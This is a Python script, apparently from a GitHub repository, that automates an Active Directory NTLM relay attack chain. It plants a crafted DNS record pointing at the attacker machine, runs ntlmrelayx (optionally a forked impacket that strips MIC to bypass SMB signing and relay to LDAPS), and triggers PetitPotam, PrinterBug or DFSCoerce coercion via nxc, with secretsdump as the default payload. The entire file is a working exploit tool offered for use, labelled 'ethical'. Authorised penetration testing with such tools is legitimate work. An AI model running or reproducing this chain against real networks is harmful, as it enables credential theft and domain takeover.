README.md
Rendering markdown...
#!/usr/bin/env python3
import sys
import os
import argparse
import subprocess
import time
from pathlib import Path
# Check if we're in a virtual environment, if not try to use local venv
def ensure_venv():
script_dir = Path(__file__).parent.absolute()
venv_dir = script_dir / "venv"
venv_site_packages = venv_dir / "lib" / "python3" / "site-packages"
venv_python = venv_dir / "bin" / "python3"
# Check if we're already in a venv
in_venv = (hasattr(sys, 'real_prefix') or
(hasattr(sys, 'base_prefix') and sys.base_prefix != sys.prefix))
# If not in venv but local venv exists, add it to path
if not in_venv and venv_site_packages.exists():
# Find the actual python version directory
for py_dir in venv_dir.glob("lib/python3.*"):
site_packages = py_dir / "site-packages"
if site_packages.exists():
if str(site_packages) not in sys.path:
sys.path.insert(0, str(site_packages))
break
# Check if required packages are available
try:
import ldap3
except ImportError:
print("[!] Required packages not found.")
if venv_dir.exists():
print("[!] Virtual environment exists but packages may not be installed.")
print("[!] Please run:")
print(f" source {venv_dir}/bin/activate")
print(f" pip install -r requirements.txt")
else:
print("[!] Please run the setup script first:")
print(f" ./setup.sh")
print("")
sys.exit(1)
# Return the Python executable to use (venv's Python if available, otherwise sys.executable)
if venv_python.exists():
return str(venv_python)
return sys.executable
# Ensure venv packages are available before importing other modules
VENV_PYTHON = ensure_venv()
STATIC_DNS_RECORD = "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
def ensure_forked_impacket():
"""Check if forked impacket is available, install if not."""
script_dir = Path(__file__).parent.absolute()
venv_dir = script_dir / "venv"
venv_python = venv_dir / "bin" / "python3"
if not venv_python.exists():
print("[!] Virtual environment not found. Please run ./setup.sh first.")
sys.exit(1)
# Check if forked version is available by checking for remove_mic_partial in help
try:
result = subprocess.run(
[str(venv_python), "ntlmrelayx.py", "--help"],
capture_output=True,
text=True,
timeout=5
)
if result.returncode == 0 and "--remove-mic-partial" in result.stdout:
return True
except:
pass
# Forked version not available, install it
print("[*] Forked impacket version not found. Installing...")
try:
result = subprocess.run(
[str(venv_python), "-m", "pip", "install", "--upgrade", "git+https://github.com/decoder-it/impacket-partial-mic.git#egg=impacket"],
check=True,
capture_output=True,
text=True
)
print("[+] Forked impacket version installed successfully.")
return True
except subprocess.CalledProcessError as e:
print(f"[!] Failed to install forked impacket version.")
if e.stderr:
print(f"[!] Error: {e.stderr}")
print("[!] Please install manually: pip install git+https://github.com/decoder-it/impacket-partial-mic.git#egg=impacket")
return False
def run_dnstool(user, password, attacker_ip, dns_ip, dc_fqdn):
print("[*] Adding malicious DNS record using dnstool.py...")
script_dir = Path(__file__).parent.absolute()
dnstool_path = script_dir / "dnstool.py"
dnstool_cmd = [
sys.executable, str(dnstool_path),
"-u", user,
"-p", password,
"-a", "add",
"-r", STATIC_DNS_RECORD,
"-d", attacker_ip,
"-dns-ip", dns_ip,
dc_fqdn
]
subprocess.run(dnstool_cmd, check=True)
print("[+] DNS record added.")
def wait_for_dns_record(record, dns_ip, timeout=60):
timeout = int(timeout)
print(f"[*] Waiting for DNS record {record} to propagate...")
start_time = time.time()
while time.time() - start_time < timeout:
try:
result = subprocess.run(
["dig", "+short", record, f"@{dns_ip}"],
capture_output=True, text=True
)
if result.stdout.strip():
print("[+] DNS record is live.")
return True
except Exception as e:
print(f"[!] Error checking DNS record: {e}")
time.sleep(2)
print("[!] Timeout reached. DNS record not found.")
return False
def start_ntlmrelayx(target, custom_command=None, socks=False, smb_signing=False, dc_ip=None, dc_fqdn=None, dns_ip=None):
if smb_signing:
# Ensure forked impacket is available
if not ensure_forked_impacket():
print("[!] Cannot proceed without forked impacket version.")
sys.exit(1)
print("[*] Starting ntlmrelayx.py listener with --remove-mic-partial in this terminal...")
# Determine LDAPS target: prefer dc_ip, then dc_fqdn, then dns_ip (commonly the DC)
if dc_ip:
ldaps_target = dc_ip
elif dc_fqdn:
ldaps_target = dc_fqdn
elif dns_ip:
ldaps_target = dns_ip
# Format target as ldaps://FQDNDCorIP
if not ldaps_target.startswith("ldaps://"):
ldaps_target = f"ldaps://{ldaps_target}"
# Use ntlmrelayx.py directly (available in venv PATH)
cmd = ["ntlmrelayx.py", "-t", ldaps_target, "--no-multirelay", "-i", "-smb2support", "--remove-mic-partial", "--keep-relaying"]
else:
print("[*] Starting ntlmrelayx listener in this terminal...")
# Use standard system impacket-ntlmrelayx
cmd = ["impacket-ntlmrelayx", "-t", target, "-smb2support"]
if custom_command:
cmd.extend(["-c", custom_command])
if socks:
cmd.append("-socks")
return subprocess.Popen(cmd)
def run_petitpotam(target_ip, domain, user, password, method="PetitPotam"):
print(f"[*] Triggering {method} coercion via nxc...")
command_str = (
f"nxc smb {target_ip} "
f"-d {domain} "
f"-u {user} "
f"-p '{password}' "
f"-M coerce_plus "
f"-o M={method} L=\"{STATIC_DNS_RECORD}\""
)
print(f"[*] Running {method} silently in this terminal...")
subprocess.Popen(
command_str,
shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
def main():
parser = argparse.ArgumentParser(description="Ethical attack chain: dnstool + ntlmrelayx + coercion method")
parser.add_argument("-u", "--username", required=True, help="Username (DOMAIN\\user)")
parser.add_argument("-p", "--password", required=True, help="Password")
parser.add_argument("-d", "--attacker-ip", required=True, help="Attacker IP (Linux/Kali machine)")
parser.add_argument("--dns-ip", required=True, help="IP of Domain Controller (DNS)")
parser.add_argument("--dc-fqdn", help="FQDN of the Domain Controller")
parser.add_argument("--dc-ip", help="IP of the Domain Controller (alternative to --dc-fqdn)")
parser.add_argument("--target", required=True, help="Target machine for NTLM relay (FQDN)")
parser.add_argument("--target-ip", required=True, help="IP of the coercion target (for nxc)")
parser.add_argument("--custom-command", help="Run custom command instead of secretsdump")
parser.add_argument("--socks", action="store_true", help="Enable SOCKS proxy in ntlmrelayx")
parser.add_argument("--smb-signing", action="store_true", help="Use ntlmrelayx.py with --remove-mic-partial for SMB signing bypass")
parser.add_argument("-M", "--method", default="PetitPotam",
choices=["PetitPotam", "Printerbug", "DFSCoerce"],
help="Coercion method to use (default: PetitPotam)")
args = parser.parse_args()
# Validate that either --dc-fqdn or --dc-ip is provided
if not args.dc_fqdn and not args.dc_ip:
parser.error("Either --dc-fqdn or --dc-ip must be provided")
# Determine DC identifier for DNS operations (prefer FQDN, fallback to IP)
dc_identifier = args.dc_fqdn if args.dc_fqdn else args.dc_ip
# Step 1: Add DNS record (static record inside)
run_dnstool(args.username, args.password, args.attacker_ip, args.dns_ip, dc_identifier)
# Step 2: Check if DNS record was added succesfully
# Extract domain name from FQDN if available
if args.dc_fqdn:
domain_name = ".".join(args.dc_fqdn.split(".")[1:])
else:
# If only IP provided, try to extract domain from username
# Username format is DOMAIN\user, where DOMAIN might be NetBIOS name
# Common convention: NetBIOS name.lower() + ".local" = DNS domain
if "\\" in args.username:
netbios_domain = args.username.split("\\")[0].lower()
# Try common domain formats
domain_name = f"{netbios_domain}"
print(f"[*] Warning: Using inferred domain '{domain_name}' from username. If incorrect, please provide --dc-fqdn.")
else:
domain_name = "local"
print(f"[*] Warning: Could not determine domain name. Using '{domain_name}' as fallback. Please provide --dc-fqdn for accurate DNS operations.")
full_record = f"{STATIC_DNS_RECORD}.{domain_name}"
if not wait_for_dns_record(full_record, args.dns_ip, timeout=60):
print("[!] Exiting due to DNS record not being live.")
sys.exit(1)
# Step 3: Start ntlmrelayx listener
ntlmrelay_proc = start_ntlmrelayx(args.target, args.custom_command, args.socks, args.smb_signing, args.dc_ip, args.dc_fqdn, args.dns_ip)
time.sleep(5) # Give ntlmrelayx some time to start
# Step 4: Trigger coercion method
domain, user = args.username.split("\\", 1)
run_petitpotam(args.target_ip, domain, user, args.password, args.method)
print("[*] Exploit chain triggered.")
print("[*] Check this terminal for output.")
try:
ntlmrelay_proc.wait()
except KeyboardInterrupt:
print("\n[*] Keyboard interrupt received. Stopping...")
ntlmrelay_proc.terminate()
if __name__ == "__main__":
main()